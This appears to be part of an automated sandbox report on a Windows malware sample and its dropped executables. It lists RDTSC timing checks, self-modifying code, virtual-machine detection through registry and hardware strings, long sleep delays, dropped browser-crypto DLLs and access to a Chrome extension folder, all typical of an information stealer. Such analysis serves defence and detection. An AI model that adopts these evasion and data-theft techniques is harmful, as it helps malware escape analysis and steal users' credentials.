Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6FA4 second address: 7F6FC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FB4246CBDE6h 0x00000009 jmp 00007FB4246CBDF1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F6FC0 second address: 7F6FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB424542853h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F7130 second address: 7F7134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F7272 second address: 7F7278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F7278 second address: 7F727C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F727C second address: 7F7282 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7F7282 second address: 7F7288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7FB832 second address: 7FB83A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7FB98E second address: 7FB99A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB4246CBDE6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7FB99A second address: 7FB99E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 80BD83 second address: 80BDAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF4h 0x00000007 jmp 00007FB4246CBDF0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 80BDAB second address: 80BDD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB424542859h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 80BDD4 second address: 80BDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 80BDDA second address: 80BDDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 80BDDE second address: 80BDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 80BDE4 second address: 80BDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81AC3D second address: 81AC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81AAE1 second address: 81AAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81AAE5 second address: 81AB0C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB4246CBDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FB4246CBDF5h 0x00000010 jmp 00007FB4246CBDEDh 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D8EB second address: 81D8F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D4BE second address: 81D4C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D5E4 second address: 81D5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D5EA second address: 81D617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FB4246CBDF1h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FB4246CBDE6h 0x0000001b jl 00007FB4246CBDE6h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D617 second address: 81D61B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D61B second address: 81D624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D624 second address: 81D62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 81D62A second address: 81D62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 8335B7 second address: 83360D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542851h 0x00000007 js 00007FB424542846h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FB42454284Ah 0x00000015 pushad 0x00000016 popad 0x00000017 jng 00007FB424542846h 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 jbe 00007FB424542846h 0x00000027 jmp 00007FB424542857h 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 push edi 0x00000032 pop edi 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83360D second address: 833613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 837FBC second address: 837FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jne 00007FB424542846h 0x00000010 jl 00007FB424542846h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 837FD4 second address: 837FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB4246CBDEBh 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FB4246CBDE6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 837FEC second address: 837FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 836E8C second address: 836EAB instructions: 0x00000000 rdtsc 0x00000002 je 00007FB4246CBDE8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB4246CBDF3h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 836EAB second address: 836EC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FB424542846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 836EC0 second address: 836EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83718D second address: 8371C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB424542856h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB424542854h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 837488 second address: 83748C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83748C second address: 837494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83AAD4 second address: 83AAEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83AAEA second address: 83AB15 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB424542848h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FB42454285Ch 0x00000015 jmp 00007FB424542856h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83AB15 second address: 83AB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83AB1B second address: 83AB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83AC3C second address: 83AC5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnp 00007FB4246CBDFBh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83AC5A second address: 83AC86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FB42454284Ch 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007FB424542846h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83C180 second address: 83C189 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83C189 second address: 83C191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83C191 second address: 83C197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83F9BA second address: 83F9C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB424542846h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 83F9C6 second address: 83F9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 jbe 00007FB4246CBE01h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB4246CBDEDh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A00DD2 second address: 4A00E4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB42454284Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FB42454284Ch 0x00000019 adc si, 8748h 0x0000001e jmp 00007FB42454284Bh 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007FB424542858h 0x0000002a xor si, 49A8h 0x0000002f jmp 00007FB42454284Bh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A00E4B second address: 4A00E6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A00E6F second address: 4A00E82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB42454284Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 4A00E82 second address: 4A00EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007FB4246CBDECh 0x00000011 popad 0x00000012 pop ebp 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov esi, 5EC8563Fh 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0116 second address: 49E014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB424542853h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E014B second address: 49E0168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0168 second address: 49E01E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB424542857h 0x00000008 movzx eax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FB424542851h 0x00000016 sub cx, 8F96h 0x0000001b jmp 00007FB424542851h 0x00000020 popfd 0x00000021 movzx esi, di 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 mov ecx, 0E13BA1Bh 0x0000002d popad 0x0000002e push dword ptr [ebp+04h] 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 jmp 00007FB424542859h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0BB2 second address: 49E0BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0C43 second address: 49E0C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 49E0C47 second address: 49E0C64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Special instruction interceptor: First address: 59EB27 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Special instruction interceptor: First address: 59C54E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Special instruction interceptor: First address: 59EB2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: C0EB27 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: C0C54E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: C0EB2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Code function: 6_2_04A60000 rdtsc 6_2_04A60000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3097
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 2069
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1102
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1052
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\1jPL5zru3u.exe API coverage: 0.8 %
Source: C:\Users\user\Desktop\1jPL5zru3u.exe TID: 6976 Thread sleep count: 238 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7368 Thread sleep time: -56028s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7352 Thread sleep count: 1102 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7352 Thread sleep time: -2205102s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7296 Thread sleep count: 410 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7296 Thread sleep time: -12300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7600 Thread sleep time: -1080000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7344 Thread sleep count: 1052 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7344 Thread sleep time: -2105052s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3DC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C3DC930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001B5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001B5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
